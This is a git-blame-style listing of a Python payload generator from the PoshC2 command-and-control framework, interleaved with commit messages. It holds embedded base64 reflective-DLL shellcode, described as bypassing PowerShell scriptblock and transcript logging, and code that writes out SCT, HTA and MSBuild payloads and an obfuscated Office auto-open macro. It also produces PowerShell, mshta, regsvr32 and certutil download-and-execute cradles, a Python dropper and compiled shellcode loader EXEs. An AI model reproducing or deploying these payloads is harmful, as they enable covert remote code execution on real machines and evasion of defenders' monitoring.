Initial Commit
2018-07-23 08:55:15 +00:00
self.PatchDll("%sPosh_v2_x64_Shellcode.bin" % name, v2_64, v2_64_offset, "Shellcode")
# Load CLR "v4.0.30319"
self.QuickstartLog( "" +Colours.END )
self.QuickstartLog( "ReflectiveDLL that loads CLR v4.0.30319"+Colours.GREEN )
v4_86_offset = 0x000132E0 + 4
Updated Shellcode/DLL to support scriptblock / transcript bypass
2018-11-13 21:22:43 +00:00
v4_86 = "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
Initial Commit
2018-07-23 08:55:15 +00:00
self.PatchDll("%sPosh-shellcode_x86.bin" % name, v4_86, v4_86_offset, "Shellcode")
Updated Shellcode/DLL to support scriptblock / transcript bypass
2018-11-13 21:22:43 +00:00
v4_64_offset = 0x00015350 + 8
v4_64 = "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
Initial Commit
2018-07-23 08:55:15 +00:00
self.PatchDll("%sPosh-shellcode_x64.bin" % name, v4_64, v4_64_offset, "Shellcode")
def CreateSCT(self):
basefile = self.CreateRawBase()
raw1 = """<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="VBScript">
Dim ghgfhgfh
set ghgfhgfh = CreateObject("shell.application")
ghgfhgfh.ShellExecute "powershell.exe", " -exec bypass -Noninteractive -windowstyle hidden -e %s", "", "open", 0
</script>
</registration>
</scriptlet>
""" % basefile
raw2 = """<sCrIptlEt><scRIPt>
a=new ActiveXObject("Shell.Application").ShellExecute("powershell.exe"," -exec bypass -Noninteractive -windowstyle hidden -e %s","","open","0");
</scRIPt></sCrIptlEt>
""" % basefile
filename = "%srg_sct.xml" % (self.BaseDirectory)
output_file = open(filename, 'w')
output_file.write(raw1)
filename = "%scs_sct.xml" % (self.BaseDirectory)
output_file.close()
output_file = open(filename, 'w')
output_file.write(raw2)
output_file.close()
self.QuickstartLog( ""+Colours.END )
self.QuickstartLog( "Execution via Command Prompt"+Colours.GREEN )
psuri = self.HostnameIP+":"+self.Serverport+"/"+QuickCommand+"_bs"
pscmd = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (new-object system.net.webclient).downloadstring('%s')" % psuri
psurienc = base64.b64encode(pscmd.encode('UTF-16LE'))
uri = self.HostnameIP+":"+self.Serverport+"/"+QuickCommand+"_cs"
self.QuickstartLog( "powershell -exec bypass -Noninteractive -windowstyle hidden -c \"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (new-object system.net.webclient).downloadstring('%s')\"" % psuri )
self.QuickstartLog( "" )
self.QuickstartLog( "powershell -exec bypass -Noninteractive -windowstyle hidden -e %s" % psurienc )
self.QuickstartLog( ""+Colours.END )
self.QuickstartLog( "Execution via Powershell"+Colours.GREEN )
self.QuickstartLog( "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (new-object system.net.webclient).downloadstring('%s')" % psuri )
self.QuickstartLog( ""+Colours.END )
self.QuickstartLog( "Other Execution Methods"+Colours.GREEN )
self.QuickstartLog( "mshta.exe vbscript:GetObject(\"script:%s\")(window.close)" % uri )
self.QuickstartLog( "" )
uri = self.HostnameIP+":"+self.Serverport+"/"+QuickCommand+"_rg"
self.QuickstartLog( "regsvr32 /s /n /u /i:%s scrobj.dll" % uri )
def CreateHTA(self):
basefile = self.CreateRawBase(full=True)
hta = """<script>
ao=new ActiveXObject("W"+"S"+"cr"+"ip"+"t."+"Sh"+"e"+"l"+"l");
ao.run('%s', 0);window.close();
</script>""" % basefile
self.QuickstartLog( "HTA Payload written to: %sLauncher.hta" % self.BaseDirectory )
filename = "%sLauncher.hta" % (self.BaseDirectory)
output_file = open(filename, 'w')
output_file.write(hta)
output_file.close()
def CreateCS(self):
basefile = self.CreateRawBase()
with open("%sPosh.cs" % FilesDirectory, 'rb') as f:
content = f.read()
cs = content.replace("#REPLACEME#",basefile)
self.QuickstartLog( "CS Payload written to: %sPosh.cs" % self.BaseDirectory )
filename = "%sPosh.cs" % (self.BaseDirectory)
output_file = open(filename, 'w')
output_file.write(cs)
output_file.close()
def CreatePython(self, name=""):
self.QuickstartLog( ""+Colours.END )
self.QuickstartLog( "OSX Python Payload:"+Colours.GREEN )
py = base64.b64encode(self.Python)
Updated to remove requirement for pycrypto for Python implants
2018-08-03 21:14:33 +00:00
#print self.Python
Initial Commit
2018-07-23 08:55:15 +00:00
pydropper = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python &" % py
'Updated Python Implant to Work with createnewpayload'
2018-09-23 07:49:00 +00:00
filename = "%s%spy_dropper.py" % (self.BaseDirectory,name)
Updated OSX for StartAnotherImplant
2018-08-14 22:40:35 +00:00
output_file = open(filename, 'w')
output_file.write(pydropper)
output_file.close()
Initial Commit
2018-07-23 08:55:15 +00:00
self.QuickstartLog( pydropper )
def CreateEXE(self, name=""):
with open("%s%sPosh-shellcode_x64.bin" % (self.BaseDirectory,name), 'rb') as f:
sc64 = f.read()
hexcode = "".join("\\x{:02x}".format(ord(c)) for c in sc64)
sc64 = formStr("char sc[]",hexcode)
with open("%sShellcode.c" % FilesDirectory, 'rb') as f:
content = f.read()
ccode = content.replace("#REPLACEME#",sc64)
self.QuickstartLog( "64bit EXE Payload written to: %s%sPosh64.exe" % (self.BaseDirectory,name) )
filename = "%s%sPosh64.c" % (self.BaseDirectory,name)
output_file = open(filename, 'w')
output_file.write(ccode)
output_file.close()
with open("%sShellcode_migrate.c" % FilesDirectory, 'rb') as f:
content = f.read()
ccode = content.replace("#REPLACEME#",sc64)
self.QuickstartLog( "64bit EXE Payload written to: %s%sPosh64_migrate.exe" % (self.BaseDirectory,name) )
filename = "%s%sPosh64_migrate.c" % (self.BaseDirectory,name)
output_file = open(filename, 'w')
output_file.write(ccode)
output_file.close()
with open("%s%sPosh-shellcode_x86.bin" % (self.BaseDirectory,name), 'rb') as f:
sc32 = f.read()
hexcode = "".join("\\x{:02x}".format(ord(c)) for c in sc32)
sc32 = formStr("char sc[]",hexcode)
with open("%sShellcode.c" % FilesDirectory, 'rb') as f:
content = f.read()
ccode = content.replace("#REPLACEME#",sc32)
self.QuickstartLog( "32bit EXE Payload written to: %s%sPosh32.exe" % (self.BaseDirectory,name) )
filename = "%s%sPosh32.c" % (self.BaseDirectory,name)
output_file = open(filename, 'w')
output_file.write(ccode)
output_file.close()
with open("%sShellcode_migrate.c" % FilesDirectory, 'rb') as f:
content = f.read()
ccode = content.replace("#REPLACEME#",sc32)
self.QuickstartLog( "32bit EXE Payload written to: %s%sPosh32_migrate.exe" % (self.BaseDirectory,name) )
filename = "%s%sPosh32_migrate.c" % (self.BaseDirectory,name)
output_file = open(filename, 'w')
output_file.write(ccode)
output_file.close()
try:
'Updated Posh EXE Downloader'
2018-08-09 14:09:07 +00:00
uri = self.HostnameIP+":"+self.Serverport+"/"+QuickCommand+"_ex6"
Initial Commit
2018-07-23 08:55:15 +00:00
filename = randomuri()
self.QuickstartLog( ""+Colours.END )
self.QuickstartLog( "Download Posh64.exe using certutil:"+Colours.GREEN )
self.QuickstartLog( "certutil -urlcache -split -f %s %%temp%%\\%s.exe" % (uri,filename) )
if os.name == 'nt':
compile64 = "C:\\TDM-GCC-64\\bin\\gcc.exe %s%sPosh64.c -o %s%sPosh64.exe" % (self.BaseDirectory, name, self.BaseDirectory,name)
compile32 = "C:\\TDM-GCC-32\\bin\\gcc.exe %s%sPosh32.c -o %s%sPosh32.exe" % (self.BaseDirectory, name, self.BaseDirectory,name)
else:
compile64 = "x86_64-w64-mingw32-gcc %s%sPosh64.c -o %s%sPosh64.exe" % (self.BaseDirectory, name, self.BaseDirectory,name)
compile32 = "i686-w64-mingw32-gcc %s%sPosh32.c -o %s%sPosh32.exe" % (self.BaseDirectory, name, self.BaseDirectory,name)
subprocess.check_output(compile64, shell=True)
subprocess.check_output(compile32, shell=True)
filename = randomuri()
self.QuickstartLog( ""+Colours.END )
self.QuickstartLog( "Download Posh32.exe using certutil:"+Colours.GREEN )
self.QuickstartLog( "certutil -urlcache -split -f %s %%temp%%\\%s.exe" % (uri,filename) )
if os.name == 'nt':
compile64 = "C:\\TDM-GCC-64\\bin\\gcc.exe %s%sPosh64_migrate.c -o %s%sPosh64_migrate.exe" % (self.BaseDirectory, name, self.BaseDirectory,name)
compile32 = "C:\\TDM-GCC-32\\bin\\gcc.exe %s%sPosh32_migrate.c -o %s%sPosh32_migrate.exe" % (self.BaseDirectory, name, self.BaseDirectory,name)
else:
compile64 = "x86_64-w64-mingw32-gcc %s%sPosh64_migrate.c -o %s%sPosh64_migrate.exe" % (self.BaseDirectory, name, self.BaseDirectory,name)
compile32 = "i686-w64-mingw32-gcc %s%sPosh32_migrate.c -o %s%sPosh32_migrate.exe" % (self.BaseDirectory, name, self.BaseDirectory,name)
subprocess.check_output(compile64, shell=True)
subprocess.check_output(compile32, shell=True)
except Exception as e:
print e
print "apt-get install mingw-w64-tools mingw-w64 mingw-w64-x86-64-dev mingw-w64-i686-dev mingw-w64-common"
def CreateMacro(self, name=""):
basefile = self.CreateRawBase()
strmacro = formStrMacro("str",basefile)
macro="""Sub Auto_Open()
UpdateMacro
End Sub
Sub AutoOpen()
UpdateMacro
End Sub
Sub Workbook_Open()
UpdateMacro
End Sub
Sub WorkbookOpen()
UpdateMacro
End Sub
Sub Document_Open()
UpdateMacro
End Sub
Sub DocumentOpen()
UpdateMacro
End Sub
Sub UpdateMacro()
Dim str, exec
%s
exec = "p"
exec = exec + "o"
exec = exec + "w"
exec = exec + "e"
exec = exec + "r"
exec = exec + "s"
exec = exec + "h"
exec = exec + "e"
exec = exec + "l"
exec = exec + "l"
exec = exec + "."
exec = exec + "e"
exec = exec + "x"
exec = exec + "e"
exec = exec + " -exec bypass -Noninteractive -windowstyle hidden -e " & str
Shell(exec)
End Sub
""" % strmacro
self.QuickstartLog( "Macro Payload written to: %s%smacro.txt" % (self.BaseDirectory,name) )
filename = "%smacro.txt" % (self.BaseDirectory)
output_file = open(filename, 'w')
output_file.write(macro)
output_file.close()
'Added MSBuild Files to PoshC2'
2018-09-16 15:53:44 +00:00
def CreateMsbuild(self, name=""):
x86filename = "%s%s" % (self.BaseDirectory,name+"Posh-shellcode_x86.bin")
x64filename = "%s%s" % (self.BaseDirectory,name+"Posh-shellcode_x64.bin")
with open(x86filename, "rb") as b86:
x86base64 = base64.b64encode(b86.read())
with open(x64filename, "rb") as b64:
x64base64 = base64.b64encode(b64.read())
'Added List-URLs Command to DB'
2018-10-10 07:16:32 +00:00
with open("%scsc.cs" % FilesDirectory, 'rb') as f:
content = f.read()
ccode = content.replace("#REPLACEME32#",x86base64)
ccode = ccode.replace("#REPLACEME64#",x64base64)
Updated msbuild.xml as file
2018-10-17 06:48:09 +00:00
filename = "%s%scsc.cs" % (self.BaseDirectory,name)
'Added List-URLs Command to DB'
2018-10-10 07:16:32 +00:00
output_file = open(filename, 'w')
output_file.write(ccode)
output_file.close()
self.QuickstartLog( "" )
self.QuickstartLog( "CSC file written to: %s%scsc.cs" % (self.BaseDirectory,name) )
Updated msbuild.xml as file
2018-10-17 06:48:09 +00:00
with open("%smsbuild.xml" % FilesDirectory, 'rb') as f:
msbuild = f.read()
'Added MSBuild Files to PoshC2'
2018-09-16 15:53:44 +00:00
projname = randomuri()
Updated msbuild.xml as file
2018-10-17 06:48:09 +00:00
msbuild = msbuild.replace("#REPLACEME32#",x86base64)
msbuild = msbuild.replace("#REPLACEME64#",x64base64)
msbuild = msbuild.replace("#REPLACEMERANDSTRING#",projname)
'Added MSBuild Files to PoshC2'
2018-09-16 15:53:44 +00:00
self.QuickstartLog( "Msbuild file written to: %s%smsbuild.xml" % (self.BaseDirectory,name) )
filename = "%s%smsbuild.xml" % (self.BaseDirectory,name)
output_file = open(filename, 'w')
output_file.write(msbuild)
output_file.close()